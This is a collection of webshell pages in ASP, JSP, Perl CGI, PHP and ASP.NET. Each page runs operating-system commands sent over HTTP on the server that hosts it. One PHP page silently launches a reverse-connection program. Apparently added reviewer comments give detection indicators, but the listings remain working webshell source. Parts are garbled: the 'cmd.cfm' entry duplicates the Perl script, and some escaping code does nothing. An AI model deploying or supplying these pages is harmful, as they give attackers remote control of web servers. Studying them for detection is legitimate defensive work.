webshell下执行命令脚本汇集
cmd1.asp
<%
' Reviewer note (defensive analysis): classic ASP command-execution page.
' - The two object tags create the shell object by CLSID rather than by ProgID, so
'   the literal string "WScript.Shell" never appears in the file; the second tag is
'   only emitted when the first raised an error ("if err"). Content signatures
'   should match the CLSIDs 72C24DD5-D70A-438B-8A42-98424B88AFB8 and
'   F935DC22-1CF0-11D0-ADB9-00C04FD58A0B as well as the ProgID.
' - The posted "cmd" field is concatenated unmodified into shell.exec and the
'   child's stdout is written into the textarea; "cmdx" supplies the interpreter path.
' - Host indicators: the web worker process spawning cmd.exe, and a cmd.exe copy
'   under "C:\Documents and Settings\All Users\" (outside the system directory).
' - Hardening to evaluate: deny the web application identity access to the
'   script-host COM classes and to cmd.exe; verify against the server's own build.
%>
<object runat=server id=shell scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=shell scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> <% end if %> <form method="post"> <input type=text name="cmdx" size=60 value="C:\Documents and Settings\All Users\cmd.exe"><br> <input type=text name="cmd" size=60 value="<%=request.form("cmd")%>"><br> <input type=submit value="cmd命令"></form> <textarea readonly cols=80 rows=20> <%On Error Resume Next if request.form("cmdx")="C:\Documents and Settings\All Users\cmd.exe" then response.write shell.exec("cmd.exe /c"&request.form("cmd")).stdout.readall end if response.write shell.exec(request.form("cmdx")&" /c"&request.form("cmd")).stdout.readall %> </textarea>
cmd2.asp
<%
' Reviewer note (defensive analysis): classic ASP page that launches a program
' through the Shell.Application COM object.
' - Form fields "text1" (program path) and "text2" (arguments) are passed straight
'   to ShellExecute with verb "open" and window style 0; no output is read back,
'   so the HTTP response only ever contains the fixed success string.
' - The page also prints the APPL_PHYSICAL_PATH server variable, disclosing the
'   application's physical directory to whoever requests it.
' - Because nothing is returned in the response, detection has to rely on process
'   telemetry (child processes of the web worker) and on content matching for
'   createobject("shell.application") together with ShellExecute in .asp files.
' - Default path points at a cmd.exe copy under
'   "C:\Documents and Settings\All Users\Documents\", a useful file-system indicator.
%>
<center><%response.write "<font size=4 color=red>shellapplication执行命令 无回显</font>" %> <BR>程序所在的物理路径: <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> </center> <html><title>shellapplication执行命令 by kyo327 </title> <body><br/><center> <form action="<%= Request.ServerVariables("URL") %>" method="POST"> <br>程序路径:<br/> <input type=text name=text1 size=60 value="C:\Documents and Settings\All Users\Documents\cmd.exe"> <br/> 参数:<br/><input type=text name=text2 size=60 value="<%=canshu%>"><br/> <input type=submit name=makelove value=运行> </form> </center></body> </html> <% appnames = Request.Form("text1") canshu = Request.Form("text2") if appnames<>"" then set kyoshell=createobject("shell.application") kyoshell.ShellExecute appnames,canshu,"","open",0 response.write "<center>执行成功!</center>" end if %>
cmd.jsp
<%--
  Reviewer note (defensive analysis): JSP page that hands the "cmd" request
  parameter to Runtime.getRuntime().exec() and streams the child's stdout into
  the response one character at a time. The child's stderr is never read.
  - Content indicator: request.getParameter(...) flowing directly into
    Runtime.exec(...) inside a .jsp file under the web root.
  - Host indicator: the servlet container's JVM spawning child processes it does
    not normally start.
  - Exceptions go to System.err / printStackTrace, so failures may show up in the
    container's stderr log rather than in the HTTP response.
--%>
<%@ page import="java.io.*" %> <% try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c); } in.close(); try { child.waitFor(); } catch (InterruptedException e) { e.printStackTrace(); } } catch (IOException e) { System.err.println(e); } %>
cmd.cgi
#!/usr/bin/perl read(STDIN,$POST,$ENV{‘CONTENT_LENGTH‘}); ($key,$command)=split(/=/,$POST); $command=~s/%([a-fA-f0-9][a-fA-f0-9])/pack("C",hex($1))/eg; $command=~s/\+/ /; $output=system "$command>a.txt"; $output=~s/\n/\<br\>/; print "Content-Type: text/html\n\n"; print <<EOF; <form action="" method=POST> <input type=text size=40 name=command value=""><br> <input type=submit value=ok> </form> EOF open(OUTPUT,"a.txt")||die "cannot open $!"; @output=<OUTPUT>; print <<EOF; <textarea name="textfield" cols="80" rows="60">@output</textarea> EOF close OUTPUT; unlink ("a.txt"); exit;
# Reviewer note (defensive analysis): Perl CGI that reads the POST body from STDIN,
# URL-decodes the value after the first "=", and passes it to system() with stdout
# redirected to a.txt; the file is then read back into a <textarea> and unlinked.
# - File-system indicator: a short-lived a.txt created and deleted in the CGI's
#   working directory on every request.
# - Host indicator: the CGI handler spawning a shell (system() with a string that
#   contains ">" goes through the shell).
# - Content indicator: system() called on a value derived from the request body with
#   no validation anywhere between the read and the call.
cmd.cfm
#!/usr/bin/perl read(STDIN,$POST,$ENV{‘CONTENT_LENGTH‘}); ($key,$command)=split(/=/,$POST); $command=~s/%([a-fA-f0-9][a-fA-f0-9])/pack("C",hex($1))/eg; $command=~s/\+/ /; $output=system "$command>a.txt"; $output=~s/\n/\<br\>/; print "Content-Type: text/html\n\n"; print <<EOF; <form action="" method=POST> <input type=text size=40 name=command value=""><br> <input type=submit value=ok> </form> EOF open(OUTPUT,"a.txt")||die "cannot open $!"; @output=<OUTPUT>; print <<EOF; <textarea name="textfield" cols="80" rows="60">@output</textarea> EOF close OUTPUT; unlink ("a.txt"); exit;
# NOTE(review): although this listing is labelled cmd.cfm, it is the same Perl CGI
# script shown under cmd.cgi and contains no CFML; the ColdFusion sample appears to
# have been lost or mis-pasted on the page. Treat it as a duplicate: the indicators
# are the same (system() on the request body, short-lived a.txt in the working
# directory, a shell spawned by the CGI handler).
cmd1.php
<?php
/*
 * Reviewer note (defensive analysis): PHP page that uses the NAME of the first GET
 * parameter to choose an execution primitive and its VALUE as the command:
 * system, passthru, exec, shell_exec, popen, a COM WScript.shell object, or
 * proc_open.
 * - The COM branch builds the interpreter name as "cm"."d.e"."xe", so the literal
 *   is split across concatenations; content scanners should normalise string
 *   concatenation before matching.
 * - The proc_open branch starts a hard-coded 8.3 short path
 *   (C:\Docume~1\alluse~1\Documents\cmd.exe) and writes the command to its stdin;
 *   a cmd.exe copy at that location is a file-system indicator.
 * - Request-log indicator: GET requests whose first query key is one of the
 *   function names listed above.
 * - Hardening to evaluate: list these functions in php.ini disable_functions and
 *   disable the COM extension where the application does not need them.
 */
?>
<?php if (key($_GET)=="system") { system($_GET[‘system‘]); } elseif (key($_GET)=="passthru") { passthru($_GET[‘passthru‘]); } elseif (key($_GET)=="exec") { $result = exec($_GET[‘exec‘]); echo $result; } elseif (key($_GET)=="shell_exec") { $result=shell_exec($_GET[‘shell_exec‘]); echo $result; } elseif (key($_GET)=="popen") { $pp = popen($_GET[‘popen‘], ‘r‘); $read = fread($pp, 2096); echo $read; pclose($pp); } elseif (key($_GET)=="wscript") { $wsh = new COM(‘WScript.shell‘) or die("PHP Create COM wscript.shell failed"); $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_GET[‘wscript‘].""); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; } elseif(key($_GET)=="proc_open"){ $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open("C:\\Docume~1\\alluse~1\\Documents\\cmd.exe", $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], "".$_GET[‘proc_open‘]."\r\n"); fwrite($pipes[0], "exit\r\n"); fclose($pipes[0]); while (!feof($pipes[1])) { echo fgets($pipes[1], 1024); } fclose($pipes[1]); while (!feof($pipes[2])) { echo fgets($pipes[2], 1024); } fclose($pipes[2]); proc_close($process); }} ?>
cmd2.php
<?php
/*
 * Reviewer note (defensive analysis): PHP page that creates a Shell.Application COM
 * object and calls open() on a hard-coded executable path under
 * C:\Docume~1\alluse~1\Documents\. It takes no request input and returns no output,
 * so the HTTP response gives no sign of what ran; detection depends on process
 * telemetry (an unexpected child process after a request to this file) and on
 * outbound-connection monitoring for the launched binary.
 */
?>
<?php $wsh = new COM(‘Shell.Application‘) or die("Shell.Application"); $exec = $wsh->open("C:\\Docume~1\\alluse~1\\Documents\\fanlian.exe"); // no output is echoed; an extra fanlian process appears, so a reverse-connection program can be run directly and connect back ?>
cmd1.aspx
<%--
  Reviewer note (defensive analysis): ASP.NET (C#) page whose button handler starts
  a Process with FileName taken from PathTextBox and Arguments from ShellTextBox,
  with UseShellExecute=false and all three standard streams redirected; stdout is
  read to the end and rendered inside a pre element.
  - The page directive sets validateRequest="false", switching off ASP.NET request
    validation for this page; that attribute on an unexpected .aspx file is itself
    worth alerting on.
  - NOTE(review): the two Replace calls map "<" to "<" and ">" to ">" as shown,
    i.e. they do nothing; presumably the original replaced them with HTML entities
    that were decoded during extraction, so command output is written unescaped
    into the label in this listing.
  - Host indicators: the ASP.NET worker process spawning a child process, and a
    cmd.exe copy under "C:\Documents and Settings\All Users\Documents\".
--%>
<%@ Page Language="c#" validateRequest = "false" aspcompat = "true" %> <html xmlns="http://www.w3.org/1999/xhtml" > <head id="Head1" runat="server"> <title>cmdshell</title></head> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <script language="C#" runat="server"> void Button_Click1(object sender, EventArgs e) { try { Process shell = new Process(); shell.StartInfo.FileName = PathTextBox.Text; shell.StartInfo.Arguments = ShellTextBox.Text; shell.StartInfo.UseShellExecute = false; shell.StartInfo.RedirectStandardInput = true; shell.StartInfo.RedirectStandardOutput = true; shell.StartInfo.RedirectStandardError = true; shell.Start(); string str1 = shell.StandardOutput.ReadToEnd(); str1 = str1.Replace("<", "<"); str1 = str1.Replace(">", ">"); myLabel.Text = "<hr><pre>" + str1 + "</pre>"; } catch (Exception Error) { Bin_Error(Error.Message); } } </script> <body> <center><font size=5 color=red>asp.net命令执行 by kyo</font><br /></center> <form id="form1" runat="server"><div style="text-align: center"> <asp:Panel ID="CmdPanel" runat="server" Height="50px" Width="800px"><hr /> 程序路径 :<asp:TextBox ID="PathTextBox" runat="server" Width="395px">C:\Documents and Settings\All Users\Documents\cmd.exe</asp:TextBox><br /> 命令参数 :<asp:TextBox ID="ShellTextBox" runat="server" Width="395px">/c ver</asp:TextBox><br /> <asp:Button ID="RunButton" runat="server" OnClick="Button_Click1" Text="运行" /></div> <div style="text-align: left"> <asp:Label ID="myLabel" runat="server" EnableViewState="False"></asp:Label></div> <hr /></asp:Panel></form></body> </html>
cmd2.aspx
<%--
  Reviewer note (defensive analysis): ASP.NET (VB) page whose "run" handler creates
  WScript.Shell through Server.CreateObject and calls exec on the string
  path.Text & " /c " & box.Text, then writes the child's stdout into ResultLabel.
  - The page directive sets validateRequest="false", aspcompat="true" and
    Debug="true"; aspcompat is what allows the COM object to be used from the page.
  - NOTE(review): as shown, the two Replace calls substitute "<" with "<" and ">"
    with ">" and so have no effect; presumably entity escapes were decoded during
    extraction.
  - Content indicator: Server.CreateObject("WScript.Shell") followed by .exec in an
    .aspx file. Host indicator: the worker process spawning cmd.exe, here defaulting
    to a copy under "C:\Documents and Settings\All Users\Documents\".
--%>
<%@ Page Language="VB" validateRequest = "false" aspcompat = "true" Debug="true"%> <script runat="server"> sub run(Src As Object, E As EventArgs) Dim StrResult As String Dim shell As Object shell = Server.CreateObject("WScript.Shell") StrResult = shell.exec( path.Text & " /c " & box.Text ).stdout.readall StrResult = Replace(StrResult , "<","<") StrResult = Replace(StrResult , ">",">") ResultLabel.Text = "<pre>" & StrResult & "</pre>" end sub </script> <html><head></head><body> <form runat="server"> 程序路径:<asp:TextBox ID="path" Width="500" Text="C:\Documents and Settings\All Users\Documents\cmd.exe" runat="server" /> <br>命令参数:<asp:TextBox ID="box" Width="200" runat="server" /> <asp:Button ID="Button" Text="Run" OnClick="run" runat="server" /><br> <asp:Label ID="ResultLabel" runat="server" /> </form></body></html>
cmd3.aspx
<%--
  Reviewer note (defensive analysis): ASP.NET (VB) page whose "run" handler creates
  Shell.Application through Server.CreateObject and calls ShellExecute with the
  program path from the "appnames" text box, arguments from "canshu", verb "open"
  and window style 0. Nothing is read back from the launched program, so the
  response carries no command output.
  - The leading HTML comment (title / author / date) is sent to the client and is a
    stable string for content matching.
  - The page directive sets validateRequest="false" and aspcompat="true".
  - With no output in the response, detection depends on process telemetry for the
    worker process and on file-integrity monitoring of the web root.
--%>
<!-- Titel: shell.application Author: kyo327 Date: 2010-06-12 --> <%@ Page Language="VB" validateRequest = "false" aspcompat = "true" %> <script runat="server"> sub run(Src As Object, E As EventArgs) Dim appName As String Dim appArgs As String Dim love As Object love = Server.CreateObject("Shell.Application") appName = appnames.Text appArgs = canshu.Text love.ShellExecute(appName, appArgs, "", "open", 0) end sub </script><html> <head><title>shellapplication For ASP.NET By kyo327</title></head> <body><form id="Form1" runat="server"> <center><font color=red size=4>利用shell.application执行命令for asp.net</font><br /> <br>程序路径名:<br /> <asp:TextBox ID="appnames" Width="400" Text="C:\Documents and Settings\All Users\Documents\cmd.exe" runat="server" /> <br>参数:<br /> <asp:TextBox ID="canshu" Width="400" runat="server" /> <br /><br /> <asp:Button ID="Button" Text="运行" OnClick="run" runat="server" /><br> </form></center></body></html>